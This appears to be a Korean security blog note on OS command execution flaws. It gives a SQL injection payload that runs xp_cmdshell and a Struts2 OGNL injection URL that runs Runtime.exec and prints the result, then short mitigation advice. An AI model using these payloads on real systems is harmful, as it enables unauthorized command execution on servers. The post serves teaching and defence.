본문 바로가기

웹/보안

운영체제 명령실행

SQL에서 운영체제 명령실행

param1=;exec master..xp_cmdshell 'md c:/abc' -- '

 

jsp에서 운영체제 명령실행 

http://192.168.0.14:8080/struts2-showcase/test.jsp?param=%23cmd='hostname', %23a=@java.lang.Runtime@getRuntime().exec(%23cmd).getInputStream(),%23b=new%20java.io.InputStreamReader(%23a),%23c=new%20java.io.BufferedReader(%23b),%23d=new%20char[10000],%23c.read(%23d),%23e=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23e.println(%23d),%23e.close

 

운영체제 명령실행 취약점은 웹서버의 권한을 낮춰서 명령결과를 최소화 시키고 php.ini의 safe_mode=On 설정

jsp에서는 Runtime.exe를 사용해야한다면 파라미터 값에 대한 검증절차 필수

 

 

http://blog.skinfosec.com/220954123887

 

[보안동향] OGNL 표현식 사용 시 잘못된 코딩으로 인한 원격 코드 실행 취약점

보안동향 . OGNL 표현식 사용 시 잘못된 코딩으로 인한 원격 코드 실행 취약점 OGNL(Object Grap...

blog.naver.com

 

' > 보안' 카테고리의 다른 글

SSTI  (0) 2019.10.01
파이썬 SQL 인젝션  (0) 2019.09.30
주요 Editor 샘플페이지 정리  (0) 2019.08.16
XSS 정리  (0) 2019.08.09
Response 헤더 정보노출 취약점  (0) 2019.08.09